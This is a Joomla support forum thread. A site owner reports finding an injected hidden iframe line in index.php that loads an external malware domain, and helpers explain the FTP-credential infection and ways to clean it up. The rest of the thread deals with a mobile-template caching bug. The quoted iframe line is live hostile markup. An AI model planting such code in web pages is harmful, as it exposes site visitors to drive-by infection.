virus?

Hallo,

I found in my index.php a script like this:

echo "<iframe src=\"http://mw.webcampaign.de\" style=\"border:0px #FFFFFF none;\" name=\"mw\" height=\"1\" width=\"1\"></iframe>";



This is a virus or what? I delete this line and now is ok. How can i protect my site to not be hacked again?

Hi

Yes it looks like a alien code. Please show me Your site. Tell me if You have anything else on You server except this site and update joomla to the latest version. Changing password to FTP and joomla panel is also a good idea.

These seems like similar virus which effected many joomla and wordpress sites in 2009. This type of infection starts at the end user’s computer, they visit a site with these tags, which leads to a site that infects the end user’s computer via exploits through javascript in a .pdf or .swf (yes, Adobe Reader and shockwave are both exploitable, update them), and then the computer runs malicious code reporting all used and found FTP logins to central server, which then periodically downloads files from all said sites, inserts code, and then uploads the modified files.

If you have a backup replace your current files with your backup.

If you don't have a backup try to replace all joomla files with a new download it will be better as you might have further infections on other files.

You can also contact your host to see how and from where they have logged in from...

Also go through joomla security checklist at below link.

Code: Select all

http://docs.joomla.org/Security_Checklist_7


I found this problem on a site a week ago. Today i had the problem on another 3 sites, for example this.
http://www.jante-originale.ro/

I deleted that line from index.php and now is ok. All sites had joomla 1.5 but not the last version. Must upgrade all sites to latest versions and change all ftp and site passwords?

Until some days ago i had Norton Internet Security 2012 and he detected that page from iframe code "http://mw.webcampaign.de" <---- DO NOT OPEN , as a virus. Unfortunately that antivirus expired and my actual version of Norton not detect anything there.

Another problem now.
This site http://www.centraletermicero.ro not loading the default layout, i think is loading Iphone template. I dont know why, i didn't change anything. Can be a virus hete too?

Tx for your answers.

Hi

If it's like NormanUK said than You do not have to change passwords. But check from where the attack was made and which files were infected. Reinstalling joomla would be a better idea than update.

For the second problem try disable joomla cache and see it then.

See below for simple info on this virus.

Code: Select all

http://en.wikipedia.org/wiki/Iframe_virus


What you can do;

Clean your temporary internet files.
Clean any cache in your computer.
Do a deep virus scan of your computer.
Change your ftp passwords as well as host control panel password.
Upload fresh copy of files to your website deleting previous files.

If you are a web designer never use your everyday computer to create client websites. Use a separate computer for each purpose.

Tx Norman and Teitbite for your help.

I think that virus spread thru FTP because i found him on all sites where i was connected in last days with FTP. I will change all passwords, i will update joomla to last version and we will see is happens again. I scanned my computer and i found some viruses in avi files!?


Problem 2. http://www.centraletermicero.ro problem was solved. I don't know how. I replaced all joomla installation files. I deleted cache, all files from tmp directory, i disabled cache plugin and cache from global configuration, purge all sh404sef links, etc. Nothing works. Next day when i wake up all was ok! strange.

Now i have the same problem on http://www.panouriradianteinfrarosu.net/ . I tried all and i checked if is a difference between files from backup and actual files, no change.

I see on homepage only:

Menu


Desktop Version Top
You are here:
Panouri radiante © panouriradianteinfrarosu.net

What is wrong here? If i push f5 site will load ok. Do you see desktop version of site here? Can be a problem with my browsers? I missed some cache to delete?

Tx again for your answers.

Hi

For http://www.panouriradianteinfrarosu.net/ please try if it works when joomla cache is completly disabled.

Is working now, i removed comment in .htaccess from RewriteBase / . I don't kow if this was the solution because until two days ago this site was ok with that comment there. All cache is disabled on site.


I really don't know what happens there but is a big problem. Can detect this ONLY if you clear browser cache, cookie, etc and try to open homepage. If you enter on site directly or from google, on another page, and after go to homepage all is ok. So, if you don't check and nobody tell you about this, your homepage can display mobile version or what was that for years:)

Anyway, tx again for your help and Happy New Year.

Hi

I've seen this joomla bug before. The problem is that cache is not cleared so when someone sees the site from mobile cache is being updated and all other users sees this layout. The only solution is to disable joomla cache and use a different cache solution. Our cache plugin is available in rest_files package for this template.

Hello,

With GK Cache i have the same problem, and plg.system.gkExtCache.zip can't be installed (i receive this message "Error! Could not find a Joomla! XML setup file in the package." maybe is a plugin for joomla 1.7??)

So, i disabled all cache sistems on site, i cleared cache, sh404sef url, etc.

In templates i have Default Layout - default
Iphone - default
Other Handheld devices - default

This means Desktop Version will load everytime everywhere, right?

Today when i entered the site with crome (all browsing data cleared) surprise!!

Untitled - 1.jpg

site load with mobile menu. Why? How can i solve this problem?

I think here is a problem with T3 + joomla's cache system. Read here:

https://compojoom.com/blog/news/mobile-templates-and-the-joomla-cache

So, in my case, when i not use cache, where is the problem?

Hi

Yes. This is 1.7 versio plugin. I thought You are using joomla 1.7 because I've seen this bug only there. So now You have supprided me with this information ;/

That's gonna be a very hard issue to resolve, because I need to see it broken first, but I'm cklicking throught it under different browsers and not an error yet. Most probably we will have to meet so I'll see it on teamviewer from Your computer.

Hello,

Tx for your answer. Add me on yahoo messenger, i will give you id and password for team viewer. My id is [email protected]

Hi

What is Yahoo Messenger ? Do You have any other communicator installed. None of my clients got this one supported I'm usind Adium, Gadu-gadu and Skype.